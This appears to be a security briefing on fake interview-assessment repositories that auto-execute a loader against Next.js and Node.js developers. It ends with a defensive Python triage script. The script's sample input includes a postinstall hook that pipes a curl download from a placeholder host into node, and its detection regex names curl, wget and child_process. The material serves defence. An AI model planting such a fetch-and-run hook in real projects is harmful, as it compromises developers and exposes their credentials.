Overview
- Attackers are posting professional-looking GitHub and Bitbucket repositories framed as job interview assessments to target Next.js and Node.js developers.
- Malicious code triggers automatically via VS Code workspace automation, npm run dev paths, or backend server startup within normal workflows.
- Variants fetch a JavaScript loader from attacker infrastructure, sometimes via Vercel-hosted artifacts, then execute it in memory and register the host with C2.
- The controller rotates identifiers, honors kill‑switch commands, uses a separate Node interpreter to reduce on‑disk artifacts, and supports staged exfiltration of source code, secrets, and cloud credentials.
- Microsoft linked a limited set of repos to observed compromises, offered no public attribution, and urged mitigations such as enforcing VS Code Workspace Trust, applying ASR rules, minimizing local secrets, and using short‑lived least‑privilege tokens.
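A pre-open triage check for a repository received as an "interview assessment", added here as an illustration rather than tooling from Microsoft or the report; it assumes that "VS Code workspace automation" means a task with runOptions.runOn set to folderOpen (which Workspace Trust blocks in untrusted folders) and that the npm trigger lives in lifecycle or dev scripts, and the indicator regex is a heuristic, not a complete signature set.

```python
"""Triage a cloned repo for auto-execution hooks before opening it in VS Code
or running npm. Added example, not the report's tooling; patterns are assumed."""
import json
import re
from pathlib import Path

# Scripts npm runs implicitly (lifecycle hooks) plus the "dev"/"start" path a
# developer invokes as part of a normal workflow.
WATCHED_SCRIPTS = {"preinstall", "install", "postinstall", "prepare",
                   "predev", "dev", "prestart", "start"}
# Assumed heuristics for "fetch remote code and run it" inside a one-liner.
SUSPICIOUS = re.compile(
    r"(curl|wget)\b|https?://|node\s+-e|\beval\(|new Function|child_process", re.I)

def check_tasks(tasks_json: str) -> list[str]:
    """Flag VS Code tasks that fire on folder open (.vscode/tasks.json)."""
    try:
        doc = json.loads(tasks_json)
    except json.JSONDecodeError:
        # VS Code accepts comments/trailing commas (JSONC); do not silently skip.
        return ["tasks.json is not strict JSON; inspect it manually"]
    findings = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
            findings.append(f"task '{task.get('label')}' runs on folderOpen: {cmd.strip()}")
    return findings

def check_package(package_json: str) -> list[str]:
    """Flag watched npm scripts that pull or evaluate code at run time."""
    scripts = json.loads(package_json).get("scripts", {})
    return [f"script '{n}' fetches/evals code: {c}"
            for n, c in scripts.items() if n in WATCHED_SCRIPTS and SUSPICIOUS.search(c)]

def triage_repo(root: Path) -> list[str]:
    """Walk a checkout (skipping node_modules) and collect all findings."""
    findings = []
    tasks = root / ".vscode" / "tasks.json"
    if tasks.exists():
        findings += check_tasks(tasks.read_text())
    for pkg in root.rglob("package.json"):
        if "node_modules" not in pkg.parts:
            findings += [f"{pkg.relative_to(root)}: {f}" for f in check_package(pkg.read_text())]
    return findings

# Constructed sample inputs (not taken from any real repository).
SAMPLE_TASKS = json.dumps({"version": "2.0.0", "tasks": [{"label": "setup", "type": "shell",
    "command": "node", "args": ["-e", "require('child_process').exec('echo hi')"],
    "runOptions": {"runOn": "folderOpen"}}]})
SAMPLE_PKG = json.dumps({"scripts": {"dev": "next dev",
    "postinstall": "curl -s https://example.invalid/l.js | node"}})

if __name__ == "__main__":
    import sys
    print("\n".join(triage_repo(Path(sys.argv[1])) or ["no auto-run hooks found"]))
```

Run it against the checkout path before granting Workspace Trust or typing npm install; a clean result only means these two hook types are absent, not that the repository is safe.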